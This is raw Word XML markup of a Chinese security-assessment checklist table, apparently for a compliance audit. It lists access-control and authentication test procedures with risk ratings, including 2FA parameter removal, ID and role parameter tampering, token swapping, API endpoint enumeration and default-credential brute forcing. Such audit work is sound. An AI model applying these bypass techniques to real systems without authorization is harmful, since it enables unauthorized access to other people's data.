                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>不存在验证码功能</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06DE7C32">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="951230" cy="467995"/>
                  <wp:effectExtent l="0" t="0" r="1270" b="8255"/>
                  <wp:docPr id="1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1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId18"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="951230" cy="467995"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="53DD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479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="45D97908">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430501AC">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21DEE30">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5AC9CEE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2.双因子逻辑缺陷：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="414784F3">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·在完成第一步认证后，跳过或篡改第二因子验证步骤（如删除2FA参数）。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6FC42C20">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67C45EB5">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>不存在双因子认证</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AB939AD">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="951230" cy="467995"/>
                  <wp:effectExtent l="0" t="0" r="1270" b="8255"/>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18"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="951230" cy="467995"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0408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1479" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2CB637D3">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访问控制</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2838" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="65886CE5">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a）应对登录的用户分配账户和权限；</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6FA554F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2.1未授权访问</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DC685D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2.2绕过授权访问</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4E6CECE4">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1.直接资源访问测试 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13EE45D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·未登录状态下直接访问需授权资源（如/admin、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>/api/user/list</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>），检查是否返回403状态码或强制跳转登录。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F8EA0DF">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·使用低权限账户登录后，尝试访问高权限功能（如删除用户、修改配置）。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="30DBF89E">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1730" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="051DAD1E">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="960120" cy="395605"/>
                  <wp:effectExtent l="0" t="0" r="1143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9"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="960120" cy="395605"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="61EF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479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1311591C">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B9445E4">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2249F094">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B5A39A0">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2.参数篡改测试</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F61897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修改URL或请求参数中的资源ID（如</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>user_id=1001</w:t>
            </w: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user_id=1002</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>），验证是否可越权操作他人数据。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="099F32D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·篡改角色标识（如</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>role=user</w:t>
            </w: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role=admin</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>），检查权限是否动态更新。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3B6D0F42">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1730" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="67DA1EF1">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="946150" cy="476885"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="18415"/>
                  <wp:docPr id="2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4"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId20"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="946150" cy="476885"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3BD9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1479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="05DDD500">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2A4117ED">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1E3F980C">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1D1DBBB">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3.API端点遍历测试</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AE754E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使用工具（Postman、Burp Suite）遍历API接口，验证是否存在未保护的敏感端点（如</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>/api/deleteAll</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>）。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08B8B9A3">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·测试HTTP方法（如GET、POST、PUT）是否被错误配置（如GET请求触发删除操作）。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="31B65B50">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1730" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="75A4F511">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="951230" cy="460375"/>
                  <wp:effectExtent l="0" t="0" r="1270" b="158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a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="951230" cy="460375"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="59A4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479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="143AC151">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2D16EA03">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631C47A9">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38FE5C19">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4.权限继承逻辑检查</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1120012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验证用户组权限继承关系，测试子账户是否意外继承父组的高权限。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EF5FEA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·检查多角色用户权限叠加时是否产生越权漏洞。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4E381C59">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1730" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="318CACF3">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="952500" cy="454025"/>
                  <wp:effectExtent l="0" t="0" r="0" b="3175"/>
                  <wp:docPr id="2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5"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId21"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="952500" cy="454025"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7826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1479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4DCEAAFD">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C828FF1">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7D8D6D6">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7D80FDC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5.会话/Token权限绑定测试</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58949F9F">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·登录低权限账户后，替换请求中的Token为高权限用户的Token，验证后端是否校验权限一致性。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24B691C2">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·使用已注销或过期的Token尝试访问资源，检查系统是否拒绝请求。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0B0273EE">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="cente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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7CEA1DCA">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="949325" cy="473075"/>
                  <wp:effectExtent l="0" t="0" r="3175" b="3175"/>
                  <wp:docPr id="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6"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId22"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="949325" cy="473075"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0D50A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8" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="62B05B37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2838" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="22A84218">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b）应重命名或删除默认账户，修改默认账户的默认口令；</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6199FE4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2.3存在默认帐户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BFC68E3">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2.4默认口令</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="290A176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1.默认账户扫描测试</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50D9B094">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·使用工具（Nmap、Metasploit）扫描目标系统，检测是否存在常见默认账户（如admin、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>root</w:t>
            </w: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guest</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>）。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DB99F2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·检查数据库、中间件（如MySQL的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>root</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>、Tomcat的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>manager</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>）的默认管理账户是否被删除或重命名。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1600976E">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492F0245">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601E3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trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="366626A4">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7E526E4">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D11ACFA">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51D11ED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2.默认口令爆破测试</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E99EDB5">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·对保留的默认账户（如</w:t>
            </w:r>
            <w:r>
              <w:rPr>
